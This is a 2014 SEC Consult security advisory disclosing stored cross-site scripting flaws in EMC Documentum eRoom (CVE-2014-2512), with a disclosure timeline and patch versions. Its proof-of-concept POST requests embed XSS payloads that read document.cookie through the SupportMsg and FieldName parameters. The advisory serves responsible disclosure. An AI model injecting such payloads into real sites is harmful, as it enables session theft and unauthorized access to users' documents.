Stored cross-site scripting vulnerabilities

SEC Consult Vulnerability Lab Security Advisory 20140701-0

=======================================================================

title: Stored cross-site scripting vulnerabilities

product: EMC Documentum eRoom

vulnerable version: 7.4.3, 7.4.4, 7.4.4 SP1

fixed version: 7.4.3 ESA-2014-060 (hot fix)

7.4.4 P19

7.4.4 SP1 ESA-2014-060 (hot fix)

CVE: CVE-2014-2512

impact: high

homepage: www.emc.com/products/detail/software2/eroom.htm

found: 2013-11-25

by: M. Heinzl

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

 

Vendor description:

-------------------

 

"EMC Documentum eRoom is easy-to-use online team collaboration software that

enables distributed teams to work together more efficiently. With Documentum

eRoom, teams around the world can accelerate document collaboration and group

activities, improve the development and delivery of products and services,

optimize collaborative business processes, improve innovation, and streamline

decision-making."

 

www.emc.com/products/detail/software2/eroom.htm

 

 

Vulnerability overview/description:

-----------------------------------

 

Documentum eRoom suffers from multiple permanent cross-site scripting

vulnerabilities, which allow an attacker to steal other user's sessions, to

impersonate other users and to gain unauthorized access to documents hosted in

eRooms. A JavaScript worm could be utilized to crawl an eRoom and gather all

available documents.

 

There are many parameters which are not properly sanitized and thus are

vulnerable to XSS.

 

 

Proof of concept:

-----------------

 

1) When creating a new database, the parameter used for the database fields

("SupportMsg") is not properly validated and is thus prone to permanent

cross-site scripting.

 

Request:

POST /eRoomASP/eRoomSubmit.asp?FormName=sDlgGeneral&Ctxt=S_1&IsERPage=TRUE&ERClickInMap=FALSE&command=btnOK&SessionKey=ZQCH5DHHZLLV6 HTTP/1.1
Host: localhost

IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=ZQCH5DHHZLLV6&ERWindowName=eRw1342094805&EditSiteName=SEC&IEUsersWorkOffline=on&AllowExtAppCommands=on&EnableWebDav=on&UseSecureCookies=on&ExpireSession=60&AlertAdminsObjectCount=on&PercentageObjectLimit=80&MembersChoosePluginOption=on&EnableFileBlocking=on&BlockedFileExtensions=accda%0D%0Aaccdb%0D%0Aaccde%0D%0Aasa%0D%0Aasp%0D%0Aaspx%0D%0Abat%0D%0Achm%0D%0Aclass%0D%0Acmd%0D%0Acom%0D%0Acpl%0D%0Acrt%0D%0Adll%0D%0Aexe%0D%0Ahlp%0D%0Ahta%0D%0Ahtm%0D%0Ahtml%0D%0Ahtw%0D%0Ahtx%0D%0Ains%0D%0Aisp%0D%0Ajs%0D%0Ajse%0D%0Alnk%0D%0Amda%0D%0Amdb%0D%0Amde%0D%0Amdt%0D%0Amdw%0D%0Amdz%0D%0Amht%0D%0Amhtml%0D%0Amsp%0D%0Aocx%0D%0Areg%0D%0Ascr%0D%0Asct%0D%0Ashb%0D%0Ashs%0D%0Aurl%0D%0Avbe%0D%0Avbs%0D%0Awsc%0D%0Awsh&OverrideURL=asd&SupportMsg=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&OtherInfoString=asd&PaginationThreshold=500&LMLThreshold=500&HMLThreshold=5000&RolodexTabs=A%3BB%3BC%3BD%3BE%3BF%3BG%3BH%3BI%3BJ%3BK%3BL%3BM%3BN%3BO%3BP%3BQ%3BR%3BS%3BT%3BU%3BV%3BW%3BX%3BY%3BZ

 

 

2) The parameter "FieldName" is not properly validated and is thus prone to

permanent cross-site scripting. A malicious payload will be executed when the

asp script "ErrLoadingPage.asp" is called.

 

Request:

POST /eRoomASP/eRoomSubmit.asp?FormName=sDlgCreateDBField&Ctxt=.test.imgsrcxonerroralert33.0_b97&ERClickInMap=FALSE&command=btnNext&SessionKey=N377T7XGBMJOO HTTP/1.1
Host: localhost

IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=N377T7XGBMJOO&ERWindowName=eRw1342086593&FieldName=xxx%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29+%2F%3E&FieldType=0

 

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities have been verified to exist in version 7.4.4 P11.

 

 

Vendor contact timeline:

------------------------

2013-12-10: Contacting vendor through security_alert@emc.com

2013-12-10: Vendor will get back after investigation by December 19th.

2013-12-20: Vendor is still investigating vulnerabilities, will get back in

January

2014-02-25: Vulnerabilities are confirmed, patch is issued for Q3 2014

2014-03-13: Notify vendor that the advisory will be published in accordance to

the responsible disclosure policy on 2014-04-20

2014-03-20: Vendor will publish patch end of June 2014

2014-03-31: Agreed to disclose advisory responsibly end of June 2014

2014-06-13: Vendor fixed issues, asking for credit line

2014-06-16: Providing credit line, asking for exact publication date

2014-06-16: Vendor announces patched version for 2014-06-30

2014-07-01: Publication of security advisory

 

 

Solution:

---------

 

Upgrade or apply hot fixes:

* 7.4.3 ESA-2014-060 (hot fix)

* 7.4.4 P19

* 7.4.4 SP1 ESA-2014-060 (hot fix)

 

Patches can be downloaded here:

support.emc.com/downloads/5324_Documentum-eRoom

 

Workaround:

-----------

None

 

 

Advisory URL:

-------------

 

www.sec-consult.com/en/advisories.html

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

 

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

 

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

Interested to work with the experts of SEC Consult?

Write to career@sec-consult.com

 

 

EOF M. Heinzl / @2014